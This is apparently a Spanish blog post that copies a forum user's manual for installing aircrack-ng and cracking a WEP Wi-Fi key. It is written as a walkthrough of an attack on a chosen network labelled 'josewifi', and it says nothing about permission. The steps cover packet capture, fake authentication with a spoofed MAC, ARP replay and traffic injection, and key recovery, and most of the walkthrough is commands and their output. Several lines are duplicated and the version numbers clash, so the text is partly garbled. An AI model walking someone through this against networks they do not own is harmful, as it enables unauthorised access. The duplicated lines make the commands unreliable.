Aircrack
Aircrack puedes instararlo en tu distribución Linux desde el
gestor
de paquetes, una vez instalado abres un terminal y
ejecutas
la orden "aircrack-ng", la cual te mostrará una lista con
todos los comandos que admite el programa.
El metodo para obtener las claves es el mismo que el
descrito arriba. Para usarlo debes introducir el comando
"aircrack-ng -opciones" sustituyendo "-opciones" por los
argumentos que sea (los que aparecen en la lista de la
imagen), e indicando después el archivo con los paquetes
(.cap o .ivs).
Aunque nosotros usemos aircrack-ng, existe otra versión
similar llamada aircrack-ptw que es capaz de descifrar
contraseñas más rapido. Ambas herramientas funcionan
igual y puedes usar cualquiera de las dos.[/size]
A continuación te copiamos un manual creado por
@gugupo sobre cómo instalar y usar Aircrack:
1º) Instalación
- Si usas Ubuntu Linux no hace falta que hagas
este paso, simplemente ve al Centro de
Software (o al gestor de paquetes Synaptic) e
instala el paquete "aircrack-ng".
- También puedes saltarte el paso de la
instalación si usas BackTrack Linux, pues trae
todo ya instalado. (Más abajo hablamos de él).
Empezamos: Antes de nada tenemos que asegurarnos
Empezamos: Antes de nada tenemos que asegurarnos
de que nuestro nucleo tiene compatibilidad con nuestro
dispositivo wifi, para saber que nucleo tenemos
abrimos
un terminal y ejecutamos
$ uname -a
Esto nos dara la info de nuestro equipo. En el caso de
que no funcione nuestra tarjeta wifi tendremos que
mirar
por internet a ver qué chip tiene e instalar el driver
adecuado.
Una vez vemos que nuestro equipo es capaz de conectar
a una red wifi conocida continuaremos. Tras haber
configurado la red wifi debemos saber qué interface
tiene:
$ iwconfig
De la lista que sale buscamos la interfaz que
corresponda al wifi. (puedes usar también el comando
ifconfig -a) A partir de aqui supongo que se llama
"eth1".
Ahora bajarmos Aircrack y lo compilamos. Antes de
descargarlo hay que instalar sus dependencias:
# apt-get install build-essential
despues a compilar:
$ wget http://download.aircrack-ng.org/aircrack-
# apt-get install build-essential
despues a compilar:
$ wget http://download.aircrack-ng.org/aircrack-
ng-1.1.tar.gz
$ tar -zxvf aircrack-ng-1.1.tar.gz
$ cd aircrack-ng-1.0-rc1
$ make
$ sudo make install
2º) Cómo usar Aircrack
Una vez tenemos en nuestras manos este programita ya
podemos empezar...
Abrimos un terminal de comandos, lo recomendable es
operar en él como root para que no tengamos que ir
poniendo "sudo" antes de cada cada orden, esto se
hace con el comando:
$ sudo su
Lo primero es ver las redes wifi a las que tenemos
acceso:
# airodump-ng eth1
# airodump-ng eth1
Consejos:
- Sustituye "eth1" por la interface de tu tarjeta wireless
(mira cuál es con el comando iwconfig).
- Si te da un error del tipo "resource busy" pueden pasar
2 cosas:
-> A lo mejor es porque que estás conectado a otra red
wifi. Para que funcione prueba a desconectarte de la red.
-> Si aun así te sigue sin funcionar ejecuta airmon-ng
start eth1 y busca a ver si en donde habla de tu tarjeta
wifi dice algo del tipo "monitor mode enabled on
mon0".
mon0".
En ese caso significa que para que funcione deberás
ejecutar airodump-ng mon0. Si este es tu caso a partir
de ahora usa mon0 en lugar de eth1 en el resto de
comandos que se explican después.
Una vez hecho esto nos sacará algo asi:
CH 14 ][ Elapsed: 1 min ][ 2008-11-26 19:28
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER
AUTH ESSID
00:00:00:00:00:00 4 43 0 0 11 54. WEP WEP josewifi
11:11:11:11:11:11 64 8 0 14 54. WEP WEP juan
BSSID STATION PWR Rate Lost Packets Probes a
En este caso tenemos 2 redes a elegir, nos fijamos en la
red 'josewifi' con una MAC de 00:00:00:00:00:00 en el
canal CH 11. Suponiendo que este es nuestro objetivo
nos fijamos en que tenga modo de encriptacion WEP.
Consejos:
- Para que airodump deje de actualizar los datos pulsa
"Cntrol+C"
.
- Puedes hacer búsquedas más detalladas usando las
- Puedes hacer búsquedas más detalladas usando las
opciones que aparecen al ejecutar "airodump --help"
Ahora que ya tenemos fijado un objetivo lo que vamos a
Ahora que ya tenemos fijado un objetivo lo que vamos a
hacer es capturar Data y Beacons para luego lanzar
aircrack-ng y descifrar su clave WEP.
1- Lanzamos airodump-ng para que capture paquetes:
$ airodump-ng --channel 11 --bssid 00:00:00:00:00:00 -w
captura eth1
Ahora lo dejamos corriendo durante todo el rato para
que vaya capturando en el archivo "captura-01.cap", que
guardará en la carpeta en la que estés trabajando
(generalmente en tu carpeta de usuario).
2- (los pasos 2, 3 y 4 son opcionales) Nos vamos a
identificar con la estacion para que nos permita inyectar
trafico y asi tener más datos para sacar la contraseña
antes.
# aireplay-ng -1 0 -a 00:00:00:00:00:00 -h
11:22:33:44:55:66 -e josewifi eth1
en la opcion -h ocultamos nuestra MAC con una
en la opcion -h ocultamos nuestra MAC con una
introducida (inventada) por nosotros
Nos deberia decir: Association successful :-)
3- ARP-request replay. Abrimos otra consola y
# aireplay-ng -3 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66
-e josewifi eth1
este tambien lo dejamos correr mientras que trabajamos.
4- Inyectar trafico. Este paso no funciona bien en todos
los dispositivos wifi, dependiendo de los drivers y
nucleo de nuestro equipo. Esto nos permitira acelerar
notablemente el proceso de captura de paquetes.
# aireplay-ng -2 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -r
captura-01.cap eth1
5- Lanzar aircrack-ng para descifrar la contraseña:
# aircrack-ng -a 1 -e josewifi -b 00:00:00:00:00:00 captura-
01.cap
El argumento "-a 1" indica que estamos descifrando una
El argumento "-a 1" indica que estamos descifrando una
contraseña WEP, para descifrar una WAP deberiamos
poner "-a 2".
Aircrack-ng tambien se debe dejar correr de fondo
mientras se capturan paquetes porque ira intentando
descifrar la clave segun vaya consiguiendo nuevos
paquetes.
¡Y ya está! Una vez tengamos practica podremos
¡Y ya está! Una vez tengamos practica podremos
crackear una contraseña WEP en unos 15 minutos
No hay comentarios:
Publicar un comentario